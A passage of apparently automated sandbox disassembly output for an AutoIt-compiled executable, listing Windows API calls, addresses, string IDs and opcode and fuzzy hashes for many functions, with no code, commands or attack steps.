                                                                                        • Opcode Fuzzy Hash: 7659b48eeb66b1d356052f3f158b796c2f4f77bde088951eb27d4d4b76098e7e
                                                                                        • Instruction Fuzzy Hash: D6C183306042498BCB04EF10C551AAEBBD5AF96354F044869FD45AB3E3DB25ED4BEB43
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00F4D5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 00F4D5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F4D5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 00F4D5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00F4D5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 00F4D5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4D5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F4D60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00F4D618
                                                                                        • SelectObject.GDI32(?,?), ref: 00F4D625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4D65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4D670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4D698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F4D6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00F4D6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00F4D6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 00F4D6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F4D6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F4D712
                                                                                        • SelectObject.GDI32(?,00F4D2A5), ref: 00F4D729
                                                                                        • DeleteObject.GDI32(?), ref: 00F4D734
                                                                                        • SelectObject.GDI32(?,?), ref: 00F4D73A
                                                                                        • DeleteObject.GDI32(?), ref: 00F4D73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 00F4D745
                                                                                        • SetBkColor.GDI32(?,?), ref: 00F4D74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: fa867d0df48abfab8a8a37270ccba607adfb3fe40055db524be85b3054954c8e
                                                                                        • Instruction ID: 783b372a25df80ee1fbfb0e954a40d28c192dd63341f17624be658b37e1a95a4
                                                                                        • Opcode Fuzzy Hash: fa867d0df48abfab8a8a37270ccba607adfb3fe40055db524be85b3054954c8e
                                                                                        • Instruction Fuzzy Hash: 13512D71E00218BFDF109FA4DC48EAE7B79EF09324F154515F925AB2A1D7B19A40EF50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F4B7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4B7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 00F4B7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F4B831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F4B847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F4B858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F4B875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F4B8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F4B8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F4B90E
                                                                                        • _memset.LIBCMT ref: 00F4B933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F4B97C
                                                                                        • _memset.LIBCMT ref: 00F4B9DB
                                                                                        • SendMessageW.USER32 ref: 00F4BA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F4BA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00F4BB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4BB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00F4BB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F4BBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 00F4BBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F4BBDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 40487ba72cc05ef81714bced6a54786c339a1d2f97f4a50a3354bcc5160cc41e
                                                                                        • Instruction ID: 61c7c0cb4b96709297a5f17f6ea028c9b1358e28448e805ceb66b0360088d6ab
                                                                                        • Opcode Fuzzy Hash: 40487ba72cc05ef81714bced6a54786c339a1d2f97f4a50a3354bcc5160cc41e
                                                                                        • Instruction Fuzzy Hash: 00E17D7190021CABDB209F65CC84AEE7F78FF05724F148156FD29AA292DB75CA41EF60
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00F4778A
                                                                                        • GetDesktopWindow.USER32 ref: 00F4779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F477A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F47808
                                                                                        • DestroyWindow.USER32(?), ref: 00F47834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F4785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F478A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00F478B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F478C9
                                                                                        • IsWindowVisible.USER32(?), ref: 00F478E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F47904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F47918
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F47930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F47956
                                                                                        • GetMonitorInfoW.USER32 ref: 00F47970
                                                                                        • CopyRect.USER32(?,?), ref: 00F47987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00F479F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 70cb03c2eda3108e3c4a5eee78316cffd6a4f035085332ed69ad01564b5dfc24
                                                                                        • Instruction ID: bb9241c365b9cdadf611fc4390f600c4f2d28f77dd75df9face73eb30c95bcea
                                                                                        • Opcode Fuzzy Hash: 70cb03c2eda3108e3c4a5eee78316cffd6a4f035085332ed69ad01564b5dfc24
                                                                                        • Instruction Fuzzy Hash: 42B1A271A08344AFDB04EF65C948B5ABBE5FF88310F00891DF9999B291D771EC04DB92
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F26CFB
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F26D21
                                                                                        • _wcscpy.LIBCMT ref: 00F26D4F
                                                                                        • _wcscmp.LIBCMT ref: 00F26D5A
                                                                                        • _wcscat.LIBCMT ref: 00F26D70
                                                                                        • _wcsstr.LIBCMT ref: 00F26D7B
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F26D97
                                                                                        • _wcscat.LIBCMT ref: 00F26DE0
                                                                                        • _wcscat.LIBCMT ref: 00F26DE7
                                                                                        • _wcsncpy.LIBCMT ref: 00F26E12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: 879b991a0cac6b59b234579db0851340af55ce313185f6339c366bdb560e5a06
                                                                                        • Instruction ID: 7689fa177a83718d6021fe8c9acec78947ae2c0fdb5fb0f7864fdeb1a6e909cf
                                                                                        • Opcode Fuzzy Hash: 879b991a0cac6b59b234579db0851340af55ce313185f6339c366bdb560e5a06
                                                                                        • Instruction Fuzzy Hash: DF41E572A002187BEB01AB649D47EBF77BCEF45310F144066F905E6182EF78DA01B6A6
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EFA939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00EFA941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EFA96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00EFA974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EFA999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EFA9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EFA9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EFA9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EFAA0D
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00EFAA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 00EFAA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFAA52
                                                                                          • Part of subcall function 00EFB63C: GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                          • Part of subcall function 00EFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00EFAB87), ref: 00EFAA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: ebbdd9ac7fe13c62395061622789c3dca4d9f552d762770ffd2c247ff352cfb4
                                                                                        • Instruction ID: 240b5492fde0b357f9a64b36249bf48f2ec65bd8f3112dbb6f501e28d52ddc40
                                                                                        • Opcode Fuzzy Hash: ebbdd9ac7fe13c62395061622789c3dca4d9f552d762770ffd2c247ff352cfb4
                                                                                        • Instruction Fuzzy Hash: 83B15EB1A0020E9FDB14DFA8DC45BAE7BB4FB08315F154229FA19EB290DB74E841DB51
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 62970417-1919597938
                                                                                        • Opcode ID: 60a7e7ca714ef6be9554f9dd816e4f65fb2e40a959c26a29017b5c88581e7365
                                                                                        • Instruction ID: dbb84da73c2f7e473318f75a51301e178bbce3c20b2d7af685c70e81519d2650
                                                                                        • Opcode Fuzzy Hash: 60a7e7ca714ef6be9554f9dd816e4f65fb2e40a959c26a29017b5c88581e7365
                                                                                        • Instruction Fuzzy Hash: 4FD11930504686ABDB44EF11C881AAAFBF4BF55350F004A1DF956731A2DB30F99EEB91
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F43735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F7DC00,00000000,?,00000000,?,?), ref: 00F437A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F437EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F43874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F43B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F43BA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 85b4e43185902ed3150051a966091579114cac0df635b571e7741820d9eba4d4
                                                                                        • Instruction ID: 74b519a19fca4b02729bf47b1a91096ed0b4ff166909a938245229780cf10e1e
                                                                                        • Opcode Fuzzy Hash: 85b4e43185902ed3150051a966091579114cac0df635b571e7741820d9eba4d4
                                                                                        • Instruction Fuzzy Hash: 2A0269756046059FCB14EF25C855A2EBBE5FF88720F04845DF99AAB3A2CB34ED01DB81
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F46C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F46D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 8abf57b682f4bee06c5bdd610a387a48d2785eeef6f299bc21f3ec4adf771dd9
• Instruction ID: 093c1f881e67e7201a59be5a92fee91e063372ddfc3104b8481514bc41f0fdcf
• Opcode Fuzzy Hash: 8abf57b682f4bee06c5bdd610a387a48d2785eeef6f299bc21f3ec4adf771dd9
• Instruction Fuzzy Hash: 0FA181306043859BCB14EF10C851A7AB7E5BF95324F10596DBD96AB3E2DB30EC06EB42
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00F1CF91
• __swprintf.LIBCMT ref: 00F1D032
• _wcscmp.LIBCMT ref: 00F1D045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F1D09A
• _wcscmp.LIBCMT ref: 00F1D0D6
• GetClassNameW.USER32(?,?,00000400), ref: 00F1D10D
• GetDlgCtrlID.USER32(?), ref: 00F1D15F
• GetWindowRect.USER32(?,?), ref: 00F1D195
• GetParent.USER32(?), ref: 00F1D1B3
• ScreenToClient.USER32(00000000), ref: 00F1D1BA
• GetClassNameW.USER32(?,?,00000100), ref: 00F1D234
• _wcscmp.LIBCMT ref: 00F1D248
• GetWindowTextW.USER32(?,?,00000400), ref: 00F1D26E
• _wcscmp.LIBCMT ref: 00F1D282
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: 5b6c66c40f9638878572850a8dbb0bb3c28a0b29848e80236bd5d660afbced25
• Instruction ID: f76e0ce77b6d526b9730636165878e94cc7f6f4972b32f701199e0e88ed47fe5
• Opcode Fuzzy Hash: 5b6c66c40f9638878572850a8dbb0bb3c28a0b29848e80236bd5d660afbced25
• Instruction Fuzzy Hash: 2EA1D231A04346AFD715DF64C884FEAB7E8FF44364F004519F9A9D2190DB70EA86EBA1
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 00F1D8EB
• _wcscmp.LIBCMT ref: 00F1D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 00F1D924
• CharUpperBuffW.USER32(?,00000000), ref: 00F1D941
• _wcscmp.LIBCMT ref: 00F1D95F
• _wcsstr.LIBCMT ref: 00F1D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F1D9A8
• _wcscmp.LIBCMT ref: 00F1D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00F1D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F1DA28
• _wcscmp.LIBCMT ref: 00F1DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 00F1DA60
• GetWindowRect.USER32(00000004,?), ref: 00F1DAC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 7337cc5d23c71e19843cf57c05f12557f9324c010ff14c3fc5b5ee68073f98a8
• Instruction ID: 4282c9899bfae150e153698f4b801da7d76526546416d29ce1cf4d562ed85f17
• Opcode Fuzzy Hash: 7337cc5d23c71e19843cf57c05f12557f9324c010ff14c3fc5b5ee68073f98a8
• Instruction Fuzzy Hash: 5981C4315083499BDB05DF14C881FAA7BF8FF84324F044469FD8A9A096DB74DD85EBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 78e716ffe924e51a81483894eb1994f079b36c1ada824533fe64bac3bb7aed4b
• Instruction ID: 4ac8c05e000bf281778db79664adcb54ed60256a5c628724263da2b51969dc3c
• Opcode Fuzzy Hash: 78e716ffe924e51a81483894eb1994f079b36c1ada824533fe64bac3bb7aed4b
• Instruction Fuzzy Hash: 98314932A48249AAEF14FB51DD43FEEB3F49B20764F200129F441B10D1EB51AA45B692
APIs
• LoadIconW.USER32(00000063), ref: 00F1EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F1EAC2
• SetWindowTextW.USER32(?,?), ref: 00F1EAD9
• GetDlgItem.USER32(?,000003EA), ref: 00F1EAEE
• SetWindowTextW.USER32(00000000,?), ref: 00F1EAF4
• GetDlgItem.USER32(?,000003E9), ref: 00F1EB04
• SetWindowTextW.USER32(00000000,?), ref: 00F1EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F1EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F1EB45
• GetWindowRect.USER32(?,?), ref: 00F1EB4E
• SetWindowTextW.USER32(?,?), ref: 00F1EBB9
• GetDesktopWindow.USER32 ref: 00F1EBBF
• GetWindowRect.USER32(00000000), ref: 00F1EBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F1EC12
• GetClientRect.USER32(?,?), ref: 00F1EC1F
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F1EC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F1EC6F
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 67b9d448a686e02cc7670a6b43f959c198022a75812e5285d8418686b0ddb386
• Instruction ID: 7feb88f8a002883f4d682a102b4ec9ab5d1bedfce885604a8757bc5538a3f4d9
• Opcode Fuzzy Hash: 67b9d448a686e02cc7670a6b43f959c198022a75812e5285d8418686b0ddb386
• Instruction Fuzzy Hash: 29514E71A00709AFDB20DFA9CD89FAEBBF5FF44714F004918E596A25A0C775A944EB10
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00F379C6
